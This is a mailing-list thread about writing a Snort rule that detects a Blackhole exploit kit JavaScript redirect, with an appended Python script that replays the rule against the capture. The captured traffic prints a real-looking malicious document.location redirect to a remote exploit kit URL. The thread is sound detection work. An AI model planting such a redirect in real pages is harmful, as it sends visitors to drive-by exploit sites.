[Snort-sigs] Proposed Signature - "COMMUNITY SPECIFIC-THREATS Blackhole Terse JavaScript hex 16 byte document.location JavaScript redirect to showthread.php"

Joel Esler jesler at ...435...
Tue Mar 13 11:43:32 EDT 2012


Nathan,

Thanks for your submission. I took the pcap you sent me and ran it through
our ruleset and received the following alerts:

1:21492:5    SPECIFIC-THREATS Blackhole landing page with specific structure - catch    Alerts: 1
1:1478:12    WEB-CGI swc access                                                         Alerts: 1
1:6390:7     SPYWARE-PUT Adware esyndicate runtime detection - ads popup                Alerts: 1
1:21548:1    BOTNET-CNC Cutwail landing page connection attempt                         Alerts: 1

A few others alerted as well, but I removed them as they were set to
"noalert"  (I remove "flowbits:noalert;" from my testing suite so I can see
everything.)

So an additional rule may not add value.  However, looking at your pcap
gave me an idea to modify 21492.  Trying that now.

J

On Tue, Mar 13, 2012 at 11:01 AM, Community Proposed <lists at ...3397...> wrote:

> I'm having issues getting this to fire, and I've tried a few permutations,
> perhaps I'm simply overlooking something stupid.  I believe you'll get the
> gist of the signature and I would appreciate feedback/changes:
>
> I had also tried, without file_data, content:"|0d 0a 0d 0a|document.location="; fast_pattern;
>
> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( \
>     msg:"COMMUNITY SPECIFIC-THREATS Blackhole Terse JavaScript hex 16 byte document.location JavaScript redirect to showthread.php"; \
>     flow:to_client,established; \
>     file_data; \
>     content:"document.location="; depth:18; fast_pattern; \
>     content:"/showthread.php?t="; distance:0; \
>     pcre:"/document.location=[^\r\n\x3b]+\/showthread.php\?t=[a-f0-9]{16}[^\r\n]\x3b/"; \
>     classtype:trojan-activity; sid:436520770; rev:1; \
> )
>
> $ pcretest
> PCRE version 8.02 2010-03-19
>
>   re> /^document.location=[^\r\n\x3b]+\/showthread.php\?t=[a-f0-9]{16}[^\r\n]\x3b/
> data> document.location='http://proxiwash.fr:8080/showthread.php?t=d7ad916d1c0396ff';
>  0: document.location='http://proxiwash.fr:8080/showthread.php?t=d7ad916d1c0396ff';
> data> document.location="http://proxiwash.fr:8080/showthread.php?t=d7ad916d1c0396ff";
>  0: document.location="http://proxiwash.fr:8080/showthread.php?t=d7ad916d1c0396ff";
> data> document.location="http://localhost"; alert("Hello from showthread.php?t=d7ad916d1c0396ff");
> No match
> data> ^C
>
> 09:16:26.964654 IP 187.45.193.142.80 > a.b.c.d.2968: P 1:386(385) ack 376 win 6432
>        0x0000:  4500 01a9 6eb9 4000 2c06 da8e bb2d c18e  E...n.@.,....-..
>        0x0010:  0ad9 7c72 0050 0b98 1333 57ff d926 a6f6  ..|r.P...3W..&..
>        0x0020:  5018 1920 0d8c 0000 4854 5450 2f31 2e31  P.......HTTP/1.1
>        0x0030:  2032 3030 204f 4b0d 0a53 6572 7665 723a  .200.OK..Server:
>        0x0040:  2041 7061 6368 650d 0a4c 6173 742d 4d6f  .Apache..Last-Mo
>        0x0050:  6469 6669 6564 3a20 5475 652c 2031 3320  dified:.Tue,.13.
>        0x0060:  4d61 7220 3230 3132 2031 333a 3135 3a32  Mar.2012.13:15:2
>        0x0070:  3620 474d 540d 0a43 6f6e 7465 6e74 2d54  6.GMT..Content-T
>        0x0080:  7970 653a 2061 7070 6c69 6361 7469 6f6e  ype:.application
>        0x0090:  2f78 2d6a 6176 6173 6372 6970 740d 0a43  /x-javascript..C
>        0x00a0:  6163 6865 2d43 6f6e 7472 6f6c 3a20 4e6f  ache-Control:.No
>        0x00b0:  2d43 6163 6865 0d0a 5072 6167 6d61 3a20  -Cache..Pragma:.
>        0x00c0:  6e6f 2d63 6163 6865 0d0a 436f 6e74 656e  no-cache..Conten
>        0x00d0:  742d 4c65 6e67 7468 3a20 3739 0d0a 4461  t-Length:.79..Da
>        0x00e0:  7465 3a20 5475 652c 2031 3320 4d61 7220  te:.Tue,.13.Mar.
>        0x00f0:  3230 3132 2031 343a 3136 3a32 3620 474d  2012.14:16:26.GM
>        0x0100:  540d 0a58 2d56 6172 6e69 7368 3a20 3137  T..X-Varnish:.17
>        0x0110:  3738 3333 3739 3431 2031 3737 3833 3334  78337941.1778334
>        0x0120:  3534 360d 0a41 6765 3a20 3332 0d0a 5669  546..Age:.32..Vi
>        0x0130:  613a 2031 2e31 2076 6172 6e69 7368 0d0a  a:.1.1.varnish..
>        0x0140:  436f 6e6e 6563 7469 6f6e 3a20 6b65 6570  Connection:.keep
>        0x0150:  2d61 6c69 7665 0d0a 0d0a 646f 6375 6d65  -alive....docume
>        0x0160:  6e74 2e6c 6f63 6174 696f 6e3d 2768 7474  nt.location='htt
>        0x0170:  703a 2f2f 7072 6f78 6977 6173 682e 6672  p://proxiwash.fr
>        0x0180:  3a38 3038 302f 7368 6f77 7468 7265 6164  :8080/showthread
>        0x0190:  2e70 6870 3f74 3d64 3761 6439 3136 6431  .php?t=d7ad916d1
>        0x01a0:  6330 3339 3666 6627 3b                   c0396ff';
>
> Thanks,
> Nathan
>
>


-- 
Joel Esler
Senior Research Engineer, VRT
OpenSource Community Manager
Sourcefire
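As an added example (not code from either poster, and not from the Sourcefire ruleset), the following Python script replays the proposed rule's three detection options offline against the response in the hex dump quoted above. It rebuilds the packet from the tcpdump -x lines (transcribed from the mail, with the archiver's mangling of the `@` in the first ASCII column undone), strips the IPv4 and TCP headers using the IHL and TCP data-offset fields, and takes the bytes after the header block as a stand-in for Snort's file_data buffer; that stand-in is an assumption, since real file_data is the dechunked and decompressed body, which this plain 79-byte response does not need. The content/depth, content/distance and pcre checks keep Snort's semantics; the only deliberate difference is that the dots in `document.location` and `showthread.php` are escaped here, whereas the posted pcre leaves them unescaped so that `.` also matches any byte. The extra sample bodies are copied from the pcretest session or constructed here; the constructed one shows that `depth:18`, not the pcre, is what rejects a body with anything in front of `document.location=`.

```python
"""Offline emulation of the proposed Snort rule against the captured response.

Added example, not the rule author's or Sourcefire's code. The packet bytes are
transcribed from the tcpdump -x output in the mail; the other sample bodies are
copied from the pcretest session or constructed for illustration."""
import re

# Transcribed from the hex dump in the thread (IPv4 + TCP headers, HTTP response).
TCPDUMP_OUTPUT = """
0x0000:  4500 01a9 6eb9 4000 2c06 da8e bb2d c18e  E...n.@.,....-..
0x0010:  0ad9 7c72 0050 0b98 1333 57ff d926 a6f6  ..|r.P...3W..&..
0x0020:  5018 1920 0d8c 0000 4854 5450 2f31 2e31  P.......HTTP/1.1
0x0030:  2032 3030 204f 4b0d 0a53 6572 7665 723a  .200.OK..Server:
0x0040:  2041 7061 6368 650d 0a4c 6173 742d 4d6f  .Apache..Last-Mo
0x0050:  6469 6669 6564 3a20 5475 652c 2031 3320  dified:.Tue,.13.
0x0060:  4d61 7220 3230 3132 2031 333a 3135 3a32  Mar.2012.13:15:2
0x0070:  3620 474d 540d 0a43 6f6e 7465 6e74 2d54  6.GMT..Content-T
0x0080:  7970 653a 2061 7070 6c69 6361 7469 6f6e  ype:.application
0x0090:  2f78 2d6a 6176 6173 6372 6970 740d 0a43  /x-javascript..C
0x00a0:  6163 6865 2d43 6f6e 7472 6f6c 3a20 4e6f  ache-Control:.No
0x00b0:  2d43 6163 6865 0d0a 5072 6167 6d61 3a20  -Cache..Pragma:.
0x00c0:  6e6f 2d63 6163 6865 0d0a 436f 6e74 656e  no-cache..Conten
0x00d0:  742d 4c65 6e67 7468 3a20 3739 0d0a 4461  t-Length:.79..Da
0x00e0:  7465 3a20 5475 652c 2031 3320 4d61 7220  te:.Tue,.13.Mar.
0x00f0:  3230 3132 2031 343a 3136 3a32 3620 474d  2012.14:16:26.GM
0x0100:  540d 0a58 2d56 6172 6e69 7368 3a20 3137  T..X-Varnish:.17
0x0110:  3738 3333 3739 3431 2031 3737 3833 3334  78337941.1778334
0x0120:  3534 360d 0a41 6765 3a20 3332 0d0a 5669  546..Age:.32..Vi
0x0130:  613a 2031 2e31 2076 6172 6e69 7368 0d0a  a:.1.1.varnish..
0x0140:  436f 6e6e 6563 7469 6f6e 3a20 6b65 6570  Connection:.keep
0x0150:  2d61 6c69 7665 0d0a 0d0a 646f 6375 6d65  -alive....docume
0x0160:  6e74 2e6c 6f63 6174 696f 6e3d 2768 7474  nt.location='htt
0x0170:  703a 2f2f 7072 6f78 6977 6173 682e 6672  p://proxiwash.fr
0x0180:  3a38 3038 302f 7368 6f77 7468 7265 6164  :8080/showthread
0x0190:  2e70 6870 3f74 3d64 3761 6439 3136 6431  .php?t=d7ad916d1
0x01a0:  6330 3339 3666 6627 3b                   c0396ff';
"""


def tcpdump_hex_to_bytes(dump: str) -> bytes:
    """Collect the hex columns of 'tcpdump -x' lines into raw packet bytes."""
    out = bytearray()
    for line in dump.splitlines():
        line = line.strip()
        if not line.startswith("0x"):
            continue
        # "0xNNNN:  <hex groups>  <ascii column>" -> keep only the hex groups
        hex_groups = line.split(":", 1)[1].strip().split("  ")[0]
        out += bytes.fromhex(hex_groups.replace(" ", ""))
    return bytes(out)


def tcp_payload(packet: bytes) -> bytes:
    """Strip the IPv4 and TCP headers using IHL and the TCP data offset."""
    ihl = (packet[0] & 0x0F) * 4
    total_len = int.from_bytes(packet[2:4], "big")
    segment = packet[ihl:total_len]
    data_off = (segment[12] >> 4) * 4
    return segment[data_off:]


def split_http_response(payload: bytes):
    """Return (header block, body). The body is an assumed stand-in for
    file_data: no dechunking or decompression, which this response needs neither."""
    head, sep, body = payload.partition(b"\r\n\r\n")
    return (head, body) if sep else (payload, b"")


# The rule's detection options, kept with Snort's semantics:
#   content:"document.location="; depth:18;   pattern entirely within the first 18 bytes
#   content:"/showthread.php?t="; distance:0;  searched from the end of the previous match
#   pcre:"/.../"                               unanchored search over the same buffer
# The posted pcre leaves the dots unescaped (matching any byte); they are escaped here.
CONTENT_1 = b"document.location="
CONTENT_2 = b"/showthread.php?t="
PCRE = re.compile(rb"document\.location=[^\r\n\x3b]+/showthread\.php\?t=[a-f0-9]{16}[^\r\n]\x3b")


def rule_matches(body: bytes) -> bool:
    pos = body.find(CONTENT_1, 0, 18)          # depth:18
    if pos < 0:
        return False
    if body.find(CONTENT_2, pos + len(CONTENT_1)) < 0:   # distance:0
        return False
    return PCRE.search(body) is not None


def check_capture() -> dict:
    """Parse the captured packet and run the rule over its response body."""
    packet = tcpdump_hex_to_bytes(TCPDUMP_OUTPUT)
    payload = tcp_payload(packet)
    head, body = split_http_response(payload)
    clen = re.search(rb"Content-Length:\s*(\d+)", head, re.I)
    return {"packet_len": len(packet), "payload_len": len(payload),
            "content_length": int(clen.group(1)) if clen else None,
            "body_len": len(body), "matches": rule_matches(body)}


SAMPLES = {
    # copied from the pcretest session in the mail
    "double_quoted": b'document.location="http://proxiwash.fr:8080/showthread.php?t=d7ad916d1c0396ff";',
    "alert_decoy": b'document.location="http://localhost"; alert("Hello from showthread.php?t=d7ad916d1c0396ff");',
    # constructed: a CRLF ahead of the script defeats depth:18 although the pcre still matches
    "leading_crlf": b"\r\ndocument.location='http://proxiwash.fr:8080/showthread.php?t=d7ad916d1c0396ff';",
}
```

check_capture() reports a 425-byte packet, a 385-byte TCP payload (matching the `1:386(385)` in the tcpdump summary line), a 79-byte body equal to the Content-Length header, and a match; the `leading_crlf` sample is the one to keep in mind, since a BOM, whitespace or comment ahead of the redirect silently fails the `depth:18` check while the pcre on its own would still match.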

